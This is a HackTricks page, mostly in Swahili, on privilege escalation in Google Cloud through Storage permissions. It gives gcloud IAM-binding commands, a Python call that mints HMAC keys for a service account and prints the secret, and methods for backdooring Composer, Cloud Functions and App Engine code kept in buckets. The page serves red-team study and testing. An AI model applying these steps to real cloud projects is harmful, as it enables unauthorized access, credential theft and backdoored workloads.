GCP - Storage Privesc

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

• Angalia the subscription plans!
• Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.

Storage

Taarifa za Msingi:

GCP - Storage Enum

storage.objects.get

Ruhusa hii inakuwezesha kupakua faili zilizohifadhiwa ndani ya Cloud Storage. Hii inaweza kukuwezesha kupandisha hadhi kwa sababu katika baadhi ya matukio taarifa nyeti zinahifadhiwa huko. Zaidi ya hayo, baadhi ya huduma za GCP zinaweka taarifa zao katika buckets:

• GCP Composer: Unapotengeneza Composer Environment the code of all the DAGs itawekwa ndani ya bucket. Kazi hizi zinaweza kuwa na taarifa za kuvutia ndani ya code yao.
• GCR (Container Registry): The image za containers zinahifadhiwa ndani ya buckets, ambayo inamaanisha kwamba kama unaweza kusoma buckets utaweza kupakua images na search for leaks and/or source code.

storage.objects.setIamPolicy

Unaweza kujipa ruhusa ya abuse any of the previous scenarios of this section.

# Add binding
gcloud storage objects add-iam-policy-binding gs://<BUCKET_NAME>/<OBJECT_NAME> \
--member="<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" \
--role="<ROLE>" \
--project=<PROJECT_ID>

# Remove binding
gcloud storage objects remove-iam-policy-binding gs://<BUCKET_NAME>/<OBJECT_NAME> \
--member="<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" \
--role="<ROLE>" \
--project=<PROJECT_ID>

# Change Policy
gcloud storage objects set-iam-policy gs://<BUCKET_NAME>/<OBJECT_NAME> - \
--project=<PROJECT_ID> <<'POLICY'
{
"bindings": [
{
"role": "<ROLE>",
"members": [
"<MEMBER_TYPE>:<MEMBER_IDENTIFIER>"
]
}
]
}
POLICY

storage.buckets.setIamPolicy

Kwa mfano wa jinsi ya kubadilisha ruhusa kwa kutumia ruhusa hii angalia ukurasa huu:

# Add binding
gcloud storage buckets add-iam-policy-binding gs://<MY_BUCKET> \
--member="<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" \
--role=<ROLE> \
--project=<MY_PROJECT>

# Remove binding
gcloud storage buckets remove-iam-policy-binding gs://<MY_BUCKET> \
--member="<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" \
--role=<ROLE> \
--project=<MY_PROJECT>

# Change policy
gcloud storage buckets set-iam-policy gs://<BUCKET_NAME> - \
--project=<PROJECT_ID> <<'POLICY'
{
"bindings": [
{
"role": "<ROLE>",
"members": [
"<MEMBER_TYPE>:<MEMBER_IDENTIFIER>"
]
}
]
}
POLICY

GCP - Public Buckets Privilege Escalation

storage.hmacKeys.create

Kipengele cha “interoperability” cha Cloud Storage, kilichobuniwa kwa ajili ya cross-cloud interactions kama AWS S3, kinajumuisha kuundwa kwa HMAC keys kwa Service Accounts na users. Mshambulizi anaweza kutekeleza hili kwa kutengeneza HMAC key kwa Service Account yenye vibali vilivyopandishwa, hivyo kupandisha vigezo ndani ya Cloud Storage. Ingawa HMAC keys zinazohusishwa na watumiaji zinapatikana tu kupitia web console, access na secret keys zinabaki perpetually accessible, kuruhusu kuhifadhiwa kama backup access. Kwa upande mwingine, HMAC keys zilizounganishwa na Service Account zinapatikana kupitia API, lakini access na secret keys hazirudishwi baada ya uundwaji, jambo linaloongeza ugumu kwa upatikanaji wa kuendelea.

# Create key
gsutil hmac create <sa-email> # You might need to execute this inside a VM instance

## If you have TROUBLES creating the HMAC key this was you can also do it contacting the API directly:
PROJECT_ID = '$PROJECT_ID'
TARGET_SERVICE_ACCOUNT = f"storage-sa@{PROJECT_ID}.iam.gserviceaccount.com"
ACCESS_TOKEN = "$CLOUDSDK_AUTH_ACCESS_TOKEN"
import requests
import json
key = requests.post(
f'https://www.googleapis.com/storage/v1/projects/{PROJECT_ID}/hmacKeys',
params={'access_token': ACCESS_TOKEN, 'serviceAccountEmail': TARGET_SERVICE_ACCOUNT}
).json()
#print(json.dumps(key, indent=4))
print(f'ID: {key["metadata"]["accessId"]}')
print(f'Secret: {key["secret"]}')


# Configure gsutil to use the HMAC key
gcloud config set pass_credentials_to_gsutil false
gsutil config -a

# Use it
gsutil ls gs://[BUCKET_NAME]

# Restore
gcloud config set pass_credentials_to_gsutil true

Script nyingine ya exploit kwa njia hii inaweza kupatikana here.

storage.objects.create, storage.objects.delete = Storage Write permissions

Ili kuunda object mpya ndani ya bucket unahitaji storage.objects.create na, kwa mujibu wa the docs, pia unahitaji storage.objects.delete ili kubadilisha object iliyopo.

A very common exploitation ya buckets ambazo unaweza kuandika ndani ya cloud ni pale ambapo bucket inahifadhi web server files, unaweza kuwa na uwezo wa kuhifadhi code mpya ambayo itatumika na web application.

Composer

Composer is Apache Airflow managed inside GCP. Ina vipengele kadhaa vinavyovutia:

• Inakimbia ndani ya GKE cluster, hivyo SA ambayo cluster inaitumia inapatikana na code inayokimbia ndani ya Composer
• Vifaa vyote vya environment ya Composer (code of DAGs, plugins na data) vinahifadhiwa ndani ya GCP bucket. Ikiwa mshambuliaji ana idhini za kusoma na kuandika juu yake, anaweza kusimamia bucket na kila mara DAG inapoundwa au kusasishwa, kuwasilisha toleo lenye backdoor ili environment ya Composer ichukue toleo lenye backdoor kutoka storage.

You can find a PoC of this attack in the repo: https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs

Cloud Functions

• Cloud Functions code inahifadhiwa katika Storage na kila mara toleo jipya linapoundwa code inatumwa kwenye bucket na kisha container mpya inaanzishwa kutokana na code hii. Kwa hivyo, kuandika juu ya code kabla toleo jipya linajengwa kunaweza kufanya cloud function itekeleze code yoyote (arbitrary code).

You can find a PoC of this attack in the repo: https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions

App Engine

AppEngine versions zinatengeneza data ndani ya bucket yenye muundo wa jina: staging.<project-id>.appspot.com. Ndani ya bucket hii, inawezekana kupata folda inayoitwa ae ambayo itakuwa na folda kwa kila toleo la AppEngine app na ndani ya folder hizi utaweza kupata faili ya manifest.json. Faili hii ina json yenye orodha ya faili zote zinazotumika kuunda toleo hilo maalum. Zaidi ya hayo, inawezekana kupata majina halisi ya faili, URL zao ndani ya GCP bucket (faili ndani ya bucket zimebadilishwa majina yao kwa sha1 hash) na sha1 hash ya kila faili.

Note that it’s not possible to pre-takeover this bucket because GCP users aren’t authorized to generate buckets using the domain name appspot.com.

Hata hivyo, kwa kuwa na idhini za kusoma & kuandika juu ya bucket hii, inawezekana kuinua mamlaka (escalate privileges) kwa SA iliyounganishwa na toleo la App Engine kwa kusimamia bucket na kila wakati mabadiliko yanapofanyika (toleo jipya), kubadilisha toleo jipya haraka iwezekanavyo. Kwa njia hii, container inayoundwa kutokana na code hii itaendesha code yenye backdoor.

Shambulio lililotajwa linaweza kufanywa kwa njia nyingi tofauti, zote zinaanza kwa kusimamia bucket ya staging.<project-id>.appspot.com:

• Pakia code kamili mpya ya toleo la AppEngine kwenye bucket tofauti inayopatikana na andaa faili ya manifest.json yenye jina jipya la bucket na sha1 hashes za faili hizo. Kisha, wakati toleo jipya linapoundwa ndani ya bucket, unahitaji tu kubadilisha faili ya manifest.json na kupakia ile lenye backdoor.
• Pakia toleo lililorekebishwa la requirements.txt ambalo litatumia dependencies zenye madhara (malicious code) na sasisha manifest.json na jina jipya la faili, URL na hash yake.
• Pakia faili main.py au app.yaml iliyorekebishwa itakayotekeleza code yenye backdoor na sasisha manifest.json na jina jipya la faili, URL na hash yake.

You can find a PoC of this attack in the repo: https://github.com/carlospolop/Monitor-Backdoor-AppEngine

GCR

• Google Container Registry inahifadhi images ndani ya buckets, ikiwa unaweza kuandika kwenye buckets hizo unaweza kuweza kutoka upande mmoja kwenda mwingine (move laterally) mahali ambapo buckets hizo zinaendeshwa.
• Bucket inayotumika na GCR ita kuwa na URL inayofanana na gs://<eu/usa/asia/nothing>.artifacts.<project>.appspot.com (The top level subdomains are specified here).

Tip

Huduma hii imekatishwa (deprecated) hivyo shambulio hili halitumiki tena. Zaidi ya hayo, Artifact Registry, huduma inayobadilisha hii, haisi kuhifadhi images kwenye buckets.

References

• https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#:~:text=apiKeys.-,create,privileges%20than%20our%20own%20user.

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

• Angalia the subscription plans!
• Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.